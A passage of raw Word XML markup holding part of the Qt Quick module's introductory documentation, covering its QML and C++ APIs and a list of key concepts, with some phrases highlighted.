        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Qt Quick module </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> both a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1569" w:history="1">
        <w:r w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML API</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which supplies QML types for creating user interfaces with the QML language, and a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1570" w:history="1">
        <w:r w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>C++ API</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for extending QML applications with C++ code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A set of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick-based UI controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also available to create user interfaces. See</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1571" w:history="1">
        <w:r w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For those new to QML and Qt Quick, please see</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1572" w:history="1">
        <w:r w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Applications</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for an introduction to writing QML applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1293" w:name="important-concepts-in-qt-quick"/>
      <w:bookmarkStart w:id="1294" w:name="_Toc483000802"/>
      <w:bookmarkStart w:id="1295" w:name="_Toc483003800"/>
      <w:bookmarkStart w:id="1296" w:name="_Toc483604153"/>
      <w:bookmarkStart w:id="1297" w:name="_Toc483605373"/>
      <w:bookmarkEnd w:id="1293"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important Concepts in Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1294"/>
      <w:bookmarkEnd w:id="1295"/>
      <w:bookmarkEnd w:id="1296"/>
      <w:bookmarkEnd w:id="1297"/>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick provides everything needed </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to create a rich application</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a fluid and dynamic user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It enables user interfaces </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be built around the behavior of user interface components and how they connect with one another</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it provides a visual canvas with its own coordinate system and rendering engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003D1644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animation and transition effects are a first class concept in Qt Quick, and visual effects can be supplemented through specialized components for particle and shader effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1573" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>The Visual Canvas</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1574" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>User Input</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1575" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Positioning</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1576" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>States, Transitions And Animations</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1577" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Data - Models, Views and Data Storage</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1578" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Particles And Graphical Effects</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1579" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Convenience Types</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>When using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module, you will need to know how to write QML applications using the QML language. In particular, QML Basics and QML Essentials from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1580" w:history="1">
        <w:r w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Applications</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To find out more about using the QML language, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1581" w:history="1">
        <w:r w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
